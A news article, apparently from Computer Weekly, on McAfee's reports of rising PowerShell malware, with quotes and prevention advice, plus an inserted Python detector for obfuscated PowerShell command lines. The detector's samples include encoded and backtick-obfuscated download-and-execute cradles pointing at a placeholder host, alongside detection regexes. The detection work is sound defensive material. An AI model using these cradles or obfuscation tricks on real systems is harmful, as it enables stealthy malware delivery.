PowerShell is used mainly to automate administration tasks, such as running background commands, checking services installed on the system, terminating processes and managing configurations of systems and servers.
But attackers have used the PowerShell scripting language as a powerful, flexible tool for carrying out malicious attacks, McAfee warned.
McAfee Labs saw PowerShell malware grow by 267% in the fourth quarter of 2017, and by 432% year over year, as the threat category increasingly became a go-to toolbox for cyber criminals.
McAfee said the scripting language had become irresistible, with attackers using it in Microsoft Office files to execute the first stage of attacks.
In December 2017, Operation Gold Dragon, a malware campaign targeting the 2018 Winter Olympics, was uncovered. McAfee described the campaign as “an exemplary implementation of PowerShell malware in an attack”.
In its previous quarterly malware report, in September 2017, McAfee warned: “We have seen the execution of fileless malware with the help of PowerShell. Bartallex uses a combination of .bat and .vbs files to download its payload. Dridex uses PowerShell to help download and execute its payload. In the beginning of 2017, attackers used PowerShell to target the Mac.”
Scripting languages provide attackers with the same abilities as file-based malware. According to McAfee, evasion is probably the key reason for the popularity of this attack tactic. Scripts are easy to obfuscate and thus difficult to detect.
“By going digital along with so many other things in our world, crime has become easier to execute, less risky and more lucrative than ever before,” said Steve Grobman, chief technology officer for McAfee. “It should be no surprise to see criminals focusing on stealthy, fileless PowerShell attacks, low-risk routes to cash through cryptocurrency mining, and attacks on soft targets such as hospitals.”
In its September report, McAfee noted that PowerShell could be obfuscated in several ways, including command shortcuts, escape characters and encoding functions. Its ability to run directly from memory makes it stealthy and hard to detect.
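The three obfuscation tricks the report names (parameter shortcuts, backtick escape characters and base64-encoded commands) can be surfaced from process-creation logs. The Python below is an added example, not McAfee's or Computer Weekly's code; the sample command lines are constructed, and the abbreviated parameter spellings it matches are an assumption about how powershell.exe resolves prefixes of its full parameter names.

```python
import base64
import binascii
import re

# Assumption: powershell.exe accepts prefixes of its parameter names, so -e, -ec
# and -enc all mean -EncodedCommand; the blob after it must look like base64.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:i[a-z]*)?\s+hidden")
NO_PROFILE = re.compile(r"(?i)(?:^|\s)-nop[a-z]*\b")
EXEC_BYPASS = re.compile(r"(?i)(?:^|\s)-e(?:x[a-z]*|p)\s+bypass")
# Keywords typical of the first-stage downloader the report describes.
DOWNLOAD_EXEC = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression")

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; None if the blob is malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyse_command_line(cmdline):
    """Return the obfuscation and downloader indicators found in one command line."""
    indicators, decoded = [], None
    m = ENCODED_FLAG.search(cmdline)
    if m:
        indicators.append("encoded-command")
        decoded = decode_encoded_command(m.group(1))
    for name, pattern in (("hidden-window", HIDDEN_WINDOW), ("no-profile", NO_PROFILE),
                          ("execution-policy-bypass", EXEC_BYPASS)):
        if pattern.search(cmdline):
            indicators.append(name)
    text = cmdline + " " + (decoded or "")
    if "`" in text:
        indicators.append("backtick-escapes")
    # Strip backtick escapes (I`E`X -> IEX) so keyword matching sees the real token.
    if DOWNLOAD_EXEC.search(text.replace("`", "")):
        indicators.append("download-and-execute")
    return {"indicators": indicators, "decoded": decoded}

def is_suspicious(cmdline):
    """One weak indicator (e.g. -NoProfile) is everyday admin use; escalate otherwise."""
    found = analyse_command_line(cmdline)["indicators"]
    return "download-and-execute" in found or len(found) >= 2

# Constructed sample command lines (not from the article); the encoded one is built
# here so its base64 is the UTF-16LE form powershell.exe expects.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLES = {
    "encoded": "powershell.exe -nop -w hidden -enc " + base64.b64encode(_STAGE1.encode("utf-16le")).decode(),
    "escaped": "powershell -ep bypass -c \"I`E`X (New-Object Net.WebClient).Down`loadString('http://example.invalid/s.ps1')\"",
    "benign": "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
}
```

Feed real command lines from Sysmon event 1 or Windows event 4688 into `analyse_command_line` to get the same indicator list.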
How to prevent PowerShell attacks
McAfee said PowerShell malware usually arrives via spam email. The code embedded in the email carries the PowerShell script, which usually contains instructions to download a further payload that carries out the primary malicious activity.
McAfee urged IT administrators to put in place measures to prevent users from running rogue scripts.
“The biggest factor in preventing any kind of malware infection on a computer is the user. Users need to be aware of the risk of downloading and installing applications that they do not understand or trust. Malware can also be inadvertently downloaded by unaware users while browsing,” said the report.
User training is an area Emma Bickerstaffe, senior research analyst at the Information Security Forum (ISF), recently covered in her Computer Weekly article on thwarting fileless attacks, where she noted: “Several of the delivery vectors utilise some form of social engineering. This reinforces the need for organisations to train users on how to recognise and resist social engineering tactics.”
Attackers can also execute malicious commands using PowerShell in an interactive mode. In a recent Computer Weekly article covering fileless attacks, such as those that can be launched through PowerShell, Adrian Davis, director of ISC², warned: “Because nothing is written to the hard drive, the standard security controls – such as a signature-based antivirus – are rendered more, or completely, ineffective.”
McAfee recommended that IT departments ensure operating systems and browsers are kept up to date with the latest security patches. It also urged IT departments to upgrade anti-malware on endpoints and network gateways to the latest versions.
Because PowerShell is an IT administration tool, its scripts are considered legitimate code, said ISC²’s Davis. Along with McAfee’s recommendations, he said: “Look at behavioural measures – for example, tracking the activity of superusers – and look for new or strange patterns. If a user – or superuser – suddenly starts to access systems or databases at odd times of the day or in different parts of the organisation, this could be an indicator of a compromise; and the organisation should then launch its incident response/management process to counteract it.”